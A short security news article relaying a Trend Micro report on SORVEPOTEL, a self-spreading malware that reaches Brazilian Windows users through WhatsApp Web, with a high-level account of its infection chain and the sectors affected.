Trend Micro analysts have warned that Brazilian WhatsApp users are being targeted by a new self-propagating malware, SORVEPOTEL, which is aimed at infecting Windows systems.
According to experts, the attack is designed with an emphasis on speed and scale of propagation rather than data theft or extortion. SORVEPOTEL spreads via plausible phishing messages with malicious ZIP archives disguised as receipts or health apps. Notably, the phishing attachments are intended to be opened on PCs, which suggests the attackers are more interested in corporate targets than ordinary users.
After the malicious attachment is opened, the malware automatically spreads via WhatsApp Web on the PC: the infected account sends ZIP files to all contacts and groups, leading to widespread spam and often resulting in the victim’s account being suspended for violating WhatsApp’s rules.
It is noted that at this time there are no indications that the operators of this campaign are using access to infected systems to steal data or encrypt files.
Most SORVEPOTEL infections (457 out of 477) were recorded in Brazil. Government agencies are most often affected, as well as organizations in the public services, manufacturing, technology, education, and construction sectors.
If the victim opens the malicious attachment, they are prompted to launch a Windows shortcut (LNK). When it runs, a PowerShell script is executed silently, downloading the malware’s main module from an external server (e.g., sorvetenopoate[.]com).
The downloaded module is a batch script responsible for persistence: it copies itself to the Windows Startup folder so it launches after the system starts. In addition, the script executes a PowerShell command that contacts the attackers’ command server for further instructions or additional components.
Trend Micro concludes: the SORVEPOTEL example clearly shows that attackers are increasingly using popular communication platforms (such as WhatsApp) to spread malware quickly and at scale, with minimal user interaction.